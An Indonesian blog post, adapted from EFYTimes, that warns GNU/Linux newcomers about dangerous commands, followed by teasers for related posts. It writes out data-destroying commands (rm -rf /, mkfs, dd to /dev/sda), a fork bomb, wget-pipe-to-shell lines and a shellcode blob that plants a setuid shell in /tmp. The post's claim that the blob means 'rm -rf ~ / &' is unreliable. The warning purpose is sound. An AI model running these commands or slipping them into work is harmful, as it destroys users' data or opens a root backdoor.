Skip to main content

PERINTAH MALICIOUS GNU/LINUX

(Saduran bebas dari EFYTimes News http://efytimes.com/e1/fullnews.asp?edid=116920)

Ada beberapa perintah malicious GNU/Linux yang apabila dieksekusi (mode root) akan berdampak pada sistem GNU/Linux anda.

Perintah-perintah ini terbagi dalam beberapa kategori yang akan penulis uraikan sebagai berikut :

1. Hapus File, Dikrektori, atau File lainnya
Perintah yang terkenal adalah
rm -rf /
artinya anda akan menghapus direktori root (/) beserta seluruh folder/file yang terkait di dalamnya. 
rm -rf .
artinya anda akan menghapus folder berawalan . (hidden) beserta seluruh folder/file yang terkait di dalamnya
rm -rf *
artinya anda akan menghapus file/folder yang berkarakter * beserta seluruh folder/file yang terkait di dalamnya

2. Meremove data pada sebuah Perangkat (device)
Apapun yang berhubungan dengan perintah "mkfs" akan berakibat fatal dan membuat filesystem anda menjadi kosong (blank). Beberapa perintahnya adalah :
mkfs
mkfs.ext3
mkfs.anything
Block device manipulation
any_command > /dev/sda
artinya perintah ini digunakan untuk menulis data pada perangkat yang di block. Jika perintah ini dieksekusi, maka akan menyerang file system dan semua data anda akan hilang.
dd if=something of=/dev/sda

3. Forkbomb
Forkbomb merupakan perintah dengan karakter unik. Perintah ini akan menyebabkan sistem anda beku, hang, freeze, dan mengharuskan anda mereset komputer anda karena kemungkinan data corrupt atau sistem operasi anda gagal bekerja normal.
beberapa perintah tersebut adalah :
:(){:|:&};:
fork while fork (pada Perl)

4. Malicious Code in Shell script
Anda misalnya memperoleh sebuah source dari seseorang untuk sebuah shell script. Namun berhati-hatilah jangan sembarangan langsung di eksekusi. Pelajari lebih dalam mengenai shell script tersebut sebelum dieksekusi.
contoh :
wget http://some_place/some_file
sh ./some_file
atau
wget http://some_place/some_file -O- | sh

5. Malicious source code "misteri" untuk di compile dan dieksekusi
Anda misalnya memperoleh sebuah source code untuk di compile, namun berhati-hatilah jika anda belum memahami betul tentang source code tersebut.
contoh :
char esp[]__attribute__((section(".text"))) /* e.s.p
release */
= "\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68"
"\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99"
"\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7"
"\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56"
"\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31"
"\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69"
"\x6e\x2f\x73\x68\x00\x2d\x63\x00"
"cp -p /bin/sh /tmp/.beyond; chmod 4755
/tmp/.beyond;";

Perintah di atas sebenarnya berkarakter "rm -rf ~ / &" dengan resiko menyerang direktori home anda dan semua file jika anda bekerja sebagai root.

6. Tarbomb dan Decompression bombs
Hal ini sebenarnya berada di sisi kelalaian user itu sendiri (human error). Misalnya adan diberikan sebuah file tarbal (tar, kompres file) yang berukuran kecil dari sebuah sumber yang Tidak-Dipercaya. Namun, ketika anda mengekstraknya maka file tersebut berukuran sangat besar serta memenuhi sisa ruang harddisk anda. Maka, alangkah baiknya mempelajari dulu sumber yang akan anda gunakan.

Pesan Penulis
Siapa pun pernah menjadi seorang "newbie", jika anda telah mengetahui sejumlah perintah malicious GNU/Linux di atas maka gunakanlah pengetahuan tersebut untuk kebaikan.

Sekian uraian sederhana mengenai perintah malicious GNU/Linux ini penulis paparkan. Semoga bermanfaat dan salam Open Source.

Popular posts from this blog

Cara Atasi Error “[-5 - No address associated with hostname]“

Cara atas laporan error "[-5 - No address associated with hostname]" pada saat anda melakukan cek update pada sistem Ubuntu atau viarian GNU/Linux lainnya sangatlah mudah.    Untuk singkatnya silakan anda ikuti langkah-langkah berikut ini : Buka aplikasi terminal Terminal, ketik perintah "update-manager" (tanpa tanda kutip) lalu tekan Enter Aplikasi Update-Manager akan terbuka, lalu klik tombol "Settings" kemudian lihat bagian tab Ubuntu Software Klik bagian "Download From..." dan pilih Other. Pilihlah IP address United States -> 76.73.4.58 Terakhir silakan tutup atau reload dan sistem anda akan kembali meload paket-paket yang diperbaharui   Saya menggunakan tips ini pada sistem Ubuntu 12.04 LTS dan berhasil mengatasi laporan error "[-5 - No adress associated with host]" pada saat mengecek update sistem. Sekian pembahasan singkat ini. Semoga bermanfaat. Salam open source. sumber dan adaptasi test bebas:

CARA INSTALL WINBOX DI MACOS BIGSUR

Saat ini saya dan rekan-rekan tim AKHTARNET sedang mengembangkan pemasangan wifi RT/RW Net di lingkungan masyarakat sekitar. Timbullah kebutuhan untuk menggunakan Winbox sebagai manajemen Mikrotik. Namun, secara umum Winbox lumrah terinstall di sistem operasi Windows. Lalu, bagaimana cara memasang Winbox di MacOS BigSur? Install Winbox di MacOS BigSur A. Langkah-Langkah Pemasangan MacOS anda harus tersambung dengan internet, buka aplikasi terminal lalu ketik perintah berikut (jangan mode Root) untuk menginstall brew : /usr/bin/ruby -e "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/master/install)" Setelah itu,  silakan ketik perintah berikut untuk menginstall Winbox    brew install nrlquaker-winbox Selesai B. Permasalahan dan Solusi Saat pertama dijalankan jika anda memperoleh error berikut  “Winbox-mac” cannot be opened because the developer cannot be verified. Maka, anda bula folder  Applications >> klik kanan ikon Winbox >> Open Selamat mencob

Perintah Terminal Emulator Android Bagian 1

Perintah Terminal Emulator Android merupakan perintah-perintah yang dapat dijalankan pada aplikasi Terminal android anda. Jika anda GNU/Linux user, tentunya bukan hal asing mengenai perintah-perintah Terminal ini.  Terminal Emulator Android Pada kesempatan ini saya hendak berbagi beberapa perintah dasar Terminal Emulator yang berjalan pada android anda. Namun, sebelum lebih jauh, jika anda belum memiliki aplikasi terminal Emulator ini, anda dapat memasangnya pada link Google Play Stor berikut ini : Android Terminal Emulator Berikut ini, beberapa perintah dasar Terminal Emulator android yang saya rangkum dari berbagai sumber (sumber saya cantumkan di bawah postingan) : su = super user ; mengaktifkan superuser mode (root). Hal ini ditandai dengan simbol $ sebagai user biasa, dan # sebagai superuser cd = Change Directory ; Membuka suatu direktory (folder) tertentu, misalnya  cd /system ls = List ; Menampilkan isi direktory (folder) tertentu, misalnya ls /sys cat